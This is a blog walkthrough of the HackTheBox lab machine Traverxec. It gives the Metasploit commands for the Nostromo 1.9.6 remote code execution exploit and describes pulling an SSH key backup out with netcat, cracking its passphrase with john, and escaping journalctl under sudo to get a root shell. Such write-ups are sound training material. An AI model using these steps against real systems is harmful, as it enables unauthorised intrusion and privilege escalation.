HackTheBox: Traverxec

traverxec hashtag on Twitter

Host enumeration and getting the initial shell

As usual, we begin with an nmap scan to identify listening services. Here we have two services listening

  • 22: OpenSSH 7.9p1
  • 80: Nostromo 1.9.6
Nmap scan

We take a quick look on Google for nostromo 1.9.6 and find a Metasploit Framework module which we can import and try. It was pretty easy, and worked first try.

use exploit/multi/http/nostromo_code_exec
SET RHOSTS 10.10.10.165
SET RPORT 80
SET SRVHOST 10.10.14.45
SET SRVPORT 8080
exploit
Get the initial shell

Pivoting to user.txt

We have already obtained the www-data shell, our next task is to pivot to the local user before we can escalate our privileges to root permissions. Lets take a look at the nostromo web server and its configuration. We can find the configuration file in /var/nostromo/conf/nhttpd.conf.

Nostromo config file

When looking at the home page, we see that this page is by David, which could be a potential username. We look at the homedirs configuration of the nostromo web server and see /home. So perhaps, what happens is that each user has their own web page. After navigating to /home in our www-data shell, we see the David user file. In addition, the homedirs_public configuration is set to public_www. The public home directory is usually a folder which allows user-specific directories to be retrieved through the web server.  The permissions must be set such that this folder is globally readable.

We can use the www-data shell to cd into /home/david/public_www, and we see two files.

  1. .htaccess
  2. backup-ssh-identity-files.tgz

Very good, there is likely to be some useful information here. .htaccess usually contains configuration info for example which user accounts have access to certain directories. The backup of SSH files can allow us to get a SSH session as the David user. Lets use netcat to transfer the files to our localhost.

It turns out that the private key was encrypted with a passphrase. However, we can try to brute force the password using john and the ssh2john.py module.

Using ssh2john to get the id_rsa passphrase
Get user.txt flag

Escalating Privileges

In the home directory of the folder, we see an interesting/ suspicious folder named bin. When taking a look inside, we see a bash script called server-stats.sh. The good thing about bash scripts is that they are not compiled; therefore we can see the source; the commands to be executed.

Notice suspicious bin folder

The interesting thing about the final line is that we execute the journalctl binary in super user context. If we can hijack this, then we can be root.

Firstly, I check whether we can use the journalctl binary with different commands, for example with -n6 instead of -n5. This would see what kind of command we could run as sudo, as we are not able to view the output of sudo -l. Changing the journalctl command itself would always ask for a password. So I had to resort to something else…

I tried to see whether we could run the command on its own, rather than the output being piped to cat. And we can! I suppose that the purpose of piping the command into cat is so that the result is displayed in the bash script rather than going into the interactive journalctl output.

I remembered to check the gtfobins pages about the journalctl binary, and we see that journalctl has a method to get a shell, simply by typing !/bin/bash.

Enter journalctl interactive mode
Escape the binary and get root.

Closing Thoughts

A fun box for sure. I wanted to know what the sudo -l output would have been if David would have had access to view that. It also helps to explain why we were able to escape the journalctl binary so simply.

We notice that the /etc/sudoers file has been edited. However, it fails to include the | /usr/bin/cat which exists in the bash script – which could perhaps be more safe.

read /etc/sudoers file

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.